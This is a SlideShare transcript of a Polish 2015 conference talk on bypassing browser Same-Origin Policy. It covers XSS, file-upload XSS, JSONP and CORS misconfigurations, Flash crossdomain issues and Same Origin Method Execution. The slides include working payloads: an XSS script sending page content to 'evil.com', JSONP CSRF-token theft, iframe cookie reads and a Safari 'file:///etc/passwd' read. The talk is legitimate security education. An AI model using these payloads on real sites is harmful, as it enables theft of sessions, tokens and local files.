Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek

265 views

Published on

Jakub Żoczek

Language: Polish

Podczas prelekcji będzie można poznać tajniki jednego z kluczowych mechanizmów, zapewniających bezpieczeństwo w przeglądarkach - czyli Same-Origin Policy. Oprócz podstawowych informacji poznamy różne techniki, które pozwolą na ominięcie SOP i uzyskanie wrażliwych danych z interesujących nas domen.

Published in: Software
  • Be the first to comment

  • Be the first to like this

4Developers 2015: Bypassing Same-Origin Policy - Jakub Żoczek

  1. 1. Bypassing Same-Origin Policy Jakub Żoczek http://twitter.com/zoczus jakub.zoczek@allegrogroup.com zoczus@gmail.com Bypassing Same-Origin Policy
  2. 2. $ whoami • Jakub Żoczek • Specjalista ds. Bezpieczeństwa Systemów IT • Security Researcher • Bug Hunter • http://zoczus.blogspot.com • Hall of Fame: Bypassing Same-Origin Policy
  3. 3. Czym jest Same-Origin Policy? Bypassing Same-Origin Policy
  4. 4. Czym jest Same-Origin Policy? •Ta sama domena •Ten sam port •Ten sam schemat Bypassing Same-Origin Policy
  5. 5. Czym jest Same-Origin Policy? Bypassing Same-Origin Policy Dla strony http://example.com URL Komentarz http://example.com/admin/index.php http://example.com/images/logo.png https://example.com/admin/panel Inny schemat http://example.com:8080/example.html Inny port http://admin.example.com/index.php Inna domena
  6. 6. Czym jest Same-Origin Policy? Bypassing Same-Origin Policy • Zwrotka AJAX • Zawartość iframe (document / window) • <script> content • <img> content
  7. 7. Czym jest Same-Origin Policy? Bypassing Same-Origin Policy • <img src="(…)"> • <script src="(…)"> • <link href="(…)">
  8. 8. Cross-Site Scripting Bypassing Same-Origin Policy <?php echo '<h1> Wyniki wyszukiwania dla: ' . $_GET['search'] . '</h1>' // (...) ?>
  9. 9. Cross-Site Scripting Bypassing Same-Origin Policy /index.php?search=<script>alert(1);</script>
  10. 10. Cross-Site Scripting Bypassing Same-Origin Policy <html> <body> <!-- (...) --> <script> x=new XMLHttpRequest(); x.open("POST","http://evil.com/log_data", true); x.send(btoa(document.body.innerHTML)); </script>
  11. 11. Cross-Site Scripting – uplaod plików Bypassing Same-Origin Policy html / htm / shtml <html> <body> <script>alert('XSS');</script> </body> </html>
  12. 12. Cross-Site Scripting – uplaod plików Bypassing Same-Origin Policy xml/xsd/xsl/xhtml/rdf/svg/svgz <?xml version="1.0" standalone="no" ?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400" /> <script type="text/javascript"> alert('XSS'); </script> </svg>
  13. 13. Cross-Site Scripting – uplaod plików Bypassing Same-Origin Policy swf / swfl package { import flash.display.Sprite; public class xss extends Sprite { public function xss() { super(); ExternalInterface.call("alert('XSS')"); return; } } }
  14. 14. HTML Injection Bypassing Same-Origin Policy <?php header("Content-Security-Policy: script-src 'self'; object-src 'self'; style-src 'self'"); header("Content-type: text/html; charset=utf-8"); $token = "2b9ee1db6d3989f5eec70e59ab211619"; echo "<br>XSS-free Content Here " . $str; echo "<br>Your token: " . $token; echo "<script>var x = 'test';</script>”; echo "</body></html>" ?>
  15. 15. HTML Injection Bypassing Same-Origin Policy
  16. 16. HTML Injection Bypassing Same-Origin Policy
  17. 17. HTML Injection Bypassing Same-Origin Policy
  18. 18. HTML Injection Bypassing Same-Origin Policy root@ropchain:/var/log/apache2# cat access.log| grep token 213.17.226.11 - - [15/Apr/2015:16:51:57 +0200] "GET /%3Cbr%3EYour%20token:%202b9ee1db6d3989f5eec70e59ab21161 9%3Cscript%3Evar%20x%20= HTTP/1.0" 404 553 "http://lab.ropchain.org/tmp/u.php?str=%3Cimg%20src=%27http://ropchai n.org/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0"
  19. 19. JSON Bypassing Same-Origin Policy http://hostname/whoami { "logged_in":true, "login":"victim", "csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba" }
  20. 20. JSON Bypassing Same-Origin Policy http://evil.com <script src="http://hostname/whoami"></script>
  21. 21. JSONP Bypassing Same-Origin Policy http://hostname/whoami?callback=xx xx({ "logged_in":true, "login":"victim", "csrf":"46aa3b5901c2b41c90ad5de62ee1b2ba" });
  22. 22. JSONP Bypassing Same-Origin Policy http://evil.com <script>xx=function(x){alert(x.csrf);}</script> <script src="http://hostname/whoami?callback=xx"></script>
  23. 23. Access-Control-Allow-Origin Bypassing Same-Origin Policy HTTP/1.0 200 OK Date: Thu, 16 Apr 2015 08:50:19 GMT Server: Apache/2.2.22 (Debian) Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT Accept-Ranges: bytes Vary: Accept-Encoding Access-Control-Allow-Origin: http://lab.ropchain.org Content-Encoding: gzip Content-Length: 1509 Content-Type: text/html; charset=utf-8
  24. 24. Access-Control-Allow-Origin Bypassing Same-Origin Policy HTTP/1.0 200 OK Date: Thu, 16 Apr 2015 08:50:19 GMT Server: Apache/2.2.22 (Debian) Last-Modified: Mon, 16 Dec 2013 09:18:36 GMT Accept-Ranges: bytes Vary: Accept-Encoding Access-Control-Allow-Origin: * Content-Encoding: gzip Content-Length: 1509 Content-Type: text/html; charset=utf-8
  25. 25. Bypassing Same-Origin Policy
  26. 26. Safari Bypassing Same-Origin Policy
  27. 27. Bypassing Same-Origin Policy
  28. 28. Bypassing Same-Origin Policy <iframe src=http://wp.pl/ onload="alert(frames[0].document.cookie)"> </iframe> Safari
  29. 29. Bypassing Same-Origin Policy
  30. 30. Bypassing Same-Origin Policy <script> var x = new XMLHttpRequest(); x.onreadystatechange() { document.body.innerText = x.response; } x.open("GET","file:///etc/passwd", true); x.send(); </script> Safari
  31. 31. Bypassing Same-Origin Policy
  32. 32. Flash Bypassing Same-Origin Policy
  33. 33. Flash – crossdomain.xml Bypassing Same-Origin Policy http://domain.com/crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*.domain.com" secure="false"/> </cross-domain-policy>
  34. 34. Flash – crossdomain.xml Bypassing Same-Origin Policy http://domain.com/crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cross-domain-policy>
  35. 35. Flash – crossdomain.xml Bypassing Same-Origin Policy http://domain.com/crossdomain.xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy> <allow-access-from domain="*.domain.com" secure="false"/> </cross-domain-policy>
  36. 36. http://etsy.com - demo Bypassing Same-Origin Policy https://www.youtube.com/watch?v=yuOiDqpxKow
  37. 37. Flash – Security.allowDomain("*") Bypassing Same-Origin Policy
  38. 38. Flash – Security.allowDomain("*") Bypassing Same-Origin Policy SWFUpload - CVE-2013-2205 (© Szymon Gruszecki) • Security.allowDomain("*") • Kontrolujemy adres URL do uploadu • Kontrolujemy callback do zwrotki o statusie uploadu • W callbacku otrzymujemy content dokumentu • … • PROFIT!
  39. 39. Flash – Security.allowDomain("*") Bypassing Same-Origin Policy SWFUpload - CVE-2013-2205 (© Szymon Gruszecki) private function UploadSuccess(file: FileItem, serverData: String, responseReceived: Boolean = true): void { // (…) ExternalCall.UploadSuccess(this.uploadSuccess_Callback, file.ToJavaScriptObject(), serverData, responseReceived); this.UploadComplete(false); }
  40. 40. Flash – Security.allowDomain("*") Bypassing Same-Origin Policy www.paypal.com/crossdomain.xml: advertising.paypal.com/(...)/swfupload.swf - PODATNY :-) <?xml version="1.0"?> <!-- (...) --> <cross-domain-policy> <allow-access-from domain="*.paypal.com" /> <allow-access-from domain="*.paypalobjects.com" /> </cross-domain-policy>
  41. 41. http://paypal.com - demo Bypassing Same-Origin Policy https://www.youtube.com/watch?v=-3Qgwi9rAfY
  42. 42. Bypassing Same-Origin Policy public function cleanEIString(arg1: String): String { return arg1.replace(new RegExp("[^A-Za-z0-9_.]", "gi"), ""); } // (…) if (loaderInfo.parameters.readyFunction != undefined) { ExternalInterface.call( _app.model.cleanEIString(readyFunction), ExternalInterface.objectID ); }
  43. 43. Bypassing Same-Origin Policy SAME ORIGIN METHOD EXECUTION
  44. 44. Same Origin Method Execution Bypassing Same-Origin Policy
  45. 45. Same Origin Method Execution Bypassing Same-Origin Policy
  46. 46. Same Origin Method Execution Bypassing Same-Origin Policy
  47. 47. Same Origin Method Execution Bypassing Same-Origin Policy
  48. 48. Same Origin Method Execution Bypassing Same-Origin Policy
  49. 49. http://yammer.com - demo Bypassing Same-Origin Policy https://www.youtube.com/watch?v=J0f_sKpUak0
  50. 50. Pytania? Jakub Żoczek (jakub.zoczek@allegrogroup.com) http://zoczus.blogspot.com http://twitter.com/ Bypassing Same-Origin Policy

×